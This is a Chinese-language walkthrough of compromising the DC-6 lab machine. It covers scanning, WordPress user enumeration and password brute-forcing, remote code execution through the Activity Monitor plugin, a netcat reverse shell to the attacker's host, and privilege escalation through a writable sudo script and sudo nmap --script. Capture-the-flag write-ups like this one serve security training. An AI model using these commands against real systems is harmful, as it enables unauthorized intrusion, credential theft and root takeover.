靶机官网给出的两个线索需要去配置一下hosts文件

Kali里面的密码本

1.扫描局域网主机arp-scan -l

2.端口探测nmap -sV -p- 192.168.75.158

可以看到开放了22和80端口直接访问80端口是不能够解析出来的，我们需要去配置一下hosts文件Windows系统下在 C:windowssystem32driversetchosts打开后在末尾添加：192.168.75.158 wordyLinux系统下在/etc/hostsvim /etc/hosts#添加192.168.75.158 wordy现在访问即可

是一个WordPress网站，Kali有专门的扫描工具wpscan3.目录扫描apt-get install dirsearchdirsearch -u http://192.168.75.158

4.wpscan扫描用户wpscan --url http://wordy/  -e u找到五个用户

爆破1、找到五个用户名：admin、graham、mark、sarah、jens，将用户名放到一个文件里作为用户名，然后再将rockyou.txt里面的带有k01的导出作为密码，进行爆破（作者在vulnhub上给了个提示，为了减少暴力破解的时间，需要将包含“k01”的字符串从字典里筛选出来作为新字典用）vim dc-username.txt #将用户名放到其中gunzip rockyou.txt.gz rockyou.txt #去rockyou.txt.gz所在的目录解压密码本cat /usr/share/wordlists/rockyou.txt | grep k01 > dc-passwd.txt #将带有k01的密码导到dc-paswd.txt中2、使用wpscan来爆破wpscan --url http://wordy/ -U dc-username.txt -P dc-passwd.txt找到mark的密码为：helpdesk01

登陆后台http://wordy/wp-login.php

后台插件getshell1、利用Activity monitor插件的rce漏洞来getshell2、点击Activity monitor -> Tools

3、执行命令的同时使用burp抓包，发送到repeater模块前端限制了只能填写15个字符，可以F12修改长度

反弹shellKali终端上：nc -lvvp 4444burp抓包修改为：nc 192.168.75.150 4444 -e /bin/bash

获取一个稳定一点的shell终端python -c 'import pty;pty.spawn("/bin/bash")'

切换用户在/home/mark/stuff下发现一个文件，记录了用户graham的密码GSo7isUM1D4

成功切换到graham用户下

提权先查看一下有没有suid提权，没有再使用sudo -l看一下可执行的命令可以看到允许graham用户在不深入jens用户密码的情况下，使用jens身份执行/home/jens/backups.sh这个脚本文件

查看一下脚本内容cat /home/jens/backups.sh我们现在可以执行这个脚本，而且该脚本也在jens的目录下，那可以将/bin/bash写到这个脚本中，再以jens用户来执行这个脚本，那我们就可以获得jens的shell了echo "/bin/bash" >> backups.sh

然后以jens用户执行sudo -u jens ./backups.sh

已经切换到jens用户再使用sudo -l查看一下可以执行的操作

发现是可以使用nmap的root权限，将反弹shell的命令写入到脚本中，然后使用nmap来执行脚本就可以获得root用户的shell了echo 'os.execute("/bin/bash")' > shellsudo nmap --script=shell